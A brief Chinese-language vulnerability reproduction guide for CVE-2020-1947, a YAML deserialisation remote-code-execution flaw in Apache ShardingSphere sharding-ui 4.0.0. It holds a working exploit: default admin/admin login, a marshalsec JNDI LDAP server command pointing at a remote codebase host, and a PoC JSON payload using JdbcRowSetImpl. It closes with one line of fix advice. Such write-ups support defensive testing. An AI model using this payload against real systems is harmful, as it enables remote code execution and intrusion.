前言
Apache ShardingSphere是一套开源的分布式数据库中间件解决方案组成的生态圈,它由Sharding-JDBC、Sharding-Proxy和Sharding-Sidecar(计划中)这3款相互独立的产品组成。
环境搭建
wget https://archive.apache.org/dist/incubator/shardingsphere/4.0.0/apache-shardingsphere-incubating-4.0.0-sharding-ui-bin.tar.gz
tar -zxvf apache-shardingsphere-incubating-4.0.0-sharding-ui-bin.tar.gz
进入bin目录启动sharding-ui
./start.sh
漏洞复现
使用yourIP:8088 admin/admin (默认)进入配置页面。
下载zookeeper
wget https://archive.apache.org/dist/zookeeper/zookeeper-3.4.10/zookeeper-
3.4.10.tar.gz
安装zookeeper,修改zoo.cfg,然后启动在2181端口。
首先进入registry center添加一个注册中心。
并测试是否能连接成功
进入rule config 新增一条规则,填入payload,点击commit即可执行命令。
这里我们用marshalsec
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.111.129:8000/#ExportObject
Poc:
{
"name": "CVE-2020-1947",
"ruleConfiguration": " encryptors:\n encryptor_aes:\n type: aes\n props:\n aes.key.value: 123456abc\n encryptor_md5:\n type: md5\n tables:\n t_encrypt:\n columns:\n user_id:\n plainColumn: user_plain\n cipherColumn: user_cipher\n encryptor: encryptor_aes\n order_id:\n cipherColumn: order_cipher\n encryptor: encryptor_md5",
"dataSourceConfiguration": "!!com.sun.rowset.JdbcRowSetImpl\n dataSourceName: ldap://127.0.0.1:1389/ExportObject\n autoCommit: true"
}
回显了404,但是成功运行了
修复建议
升级到最新版